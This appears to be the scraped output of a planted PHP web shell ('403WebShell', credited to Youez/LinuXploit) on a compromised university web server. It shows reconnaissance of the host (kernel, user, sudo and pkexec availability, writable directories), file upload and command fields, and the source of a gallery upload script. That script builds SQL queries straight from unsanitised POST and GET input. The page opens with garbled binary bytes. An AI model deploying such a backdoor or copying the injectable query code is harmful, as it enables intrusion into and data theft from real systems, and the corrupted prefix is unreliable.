h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/igallery/admin/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/arit/igallery/admin/pages/upload_file.php
<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php //include '../../dbconnect.php';?>
<?php //include 'header.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>
<?php
if (check_mode_admin_session(1,1)) {
?>
<?php
function GenerateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}

if ($_POST["submit"])
{
	$gallery_id = $_POST["id"];
	$gallery_image_path="../../image_gallery/" . $gallery_id . "/";
	$sql = "SELECT * FROM gallery WHERE gallery_id=" . $gallery_id;
	$query = mysqli_query($conn,$sql);	
	if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))	
	{
		if(isset($_FILES["filUpload"]))
		{
			$image_folder = "../../image_gallery/" . $gallery_id ;
			if (!(file_exists($image_folder)))
			{
				mkdir($image_folder , 0755);
			}
			
			//หา image_order
			$sql = "SELECT * FROM gallery_image";
			$sql .= " WHERE ( (gallery_id=" . $gallery_id . ")";
			$sql .= " AND (image_order IS NOT NULL) )";
			$sql .= " ORDER BY image_order DESC";
			$query = mysqli_query($conn,$sql);
			if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))	
			{
				$current_image_order = $result["image_order"]+1;
			}
			else
			{
				$current_image_order = 1;
			}	
			
			foreach($_FILES['filUpload']['tmp_name'] as $key => $val)
			{
				//upload รูป
				$file_name = $_FILES['filUpload']['name'][$key];
				$file_size =$_FILES['filUpload']['size'][$key];
				$file_tmp =$_FILES['filUpload']['tmp_name'][$key];
				$file_type=$_FILES['filUpload']['type'][$key];  
				
				$fname = $file_name;
				$rawBaseName = pathinfo($fname, PATHINFO_FILENAME);
				$extension = pathinfo($fname, PATHINFO_EXTENSION);
				$lower_extension = strtolower($extension);
				if ( ($lower_extension=="jpg") OR ($lower_extension=="jpeg") OR ($lower_extension=="png") ) {	
					$num_ramdom_string = rand(10,20);
					$random_string = GenerateRandomString($num_ramdom_string);
					$u_image_path = "img" . $random_string . "." . $extension;				

					//move_uploaded_file($file_tmp,$gallery_image_path . $file_name);
					move_uploaded_file($file_tmp,$gallery_image_path . $u_image_path);
					
					//เพิ่มในฐานข้อมูล
					$sql2 = "INSERT INTO gallery_image ";
					$sql2 .="(gallery_id,image_file,image_order) ";
					$sql2 .="VALUES ";
					//$sql2 .="(". $gallery_id . ",'" . $file_name ."'," . $current_image_order . ") ";
					$sql2 .="(". $gallery_id . ",'" . $u_image_path ."'," . $current_image_order . ") ";
					$query2 = mysqli_query($conn,$sql2);	
					//$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
					if($query2) {
						echo "เพิ่มในฐานข้อมูลแล้ว";
					} else {
						echo "ไม่สามารถเพิ่มในฐานข้อมูลได้";
					}	
					$current_image_order = $current_image_order + 1;
				} //if ( ($lower_extension=="jpg") OR ($lower_extension=="jpeg") OR ($lower_extension=="png") ) {	
			}
			//echo "Copy/Upload Complete";
		}
		
		$sql = "SELECT * from gallery_image";
		$sql .= " WHERE gallery_id=" . $gallery_id;
		$sql .= " ORDER BY image_order ASC";
	
		$query = mysqli_query($conn,$sql);
	
		$num_rows = mysqli_num_rows($query);
	
		$per_page = 20;   // Per Page
		$page  = 1;
		
		if(isset($_GET["Page"]))
		{
			$page = $_GET["Page"];
		}
	
		$prev_page = $page-1;
		$next_page = $page+1;
	
		$row_start = (($per_page*$page)-$per_page);
		if($num_rows<=$per_page)
		{
			$num_pages =1;
		}
		else if(($num_rows % $per_page)==0)
		{
			$num_pages =($num_rows/$per_page) ;
		}
		else
		{
			$num_pages =($num_rows/$per_page)+1;
			$num_pages = (int)$num_pages;
		}
	
		$row_end = $per_page;
		//$row_end = $per_page * $page;
		//if($row_end > $num_rows)
		//{
		//	$row_end = $num_rows;
		//}
		
		$redirect_url = "gallery_detail.php?id=" . $gallery_id . "&Page=" . $num_pages;
		header("location:$redirect_url");
		
	}
	else //มี person_award_id?
	{
		echo "ไม่พบข้อมูล";
	} //มี person_award_id?
}
?>
<?php
} //if(check_mode_admin_session(1,1)) {
?>
<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit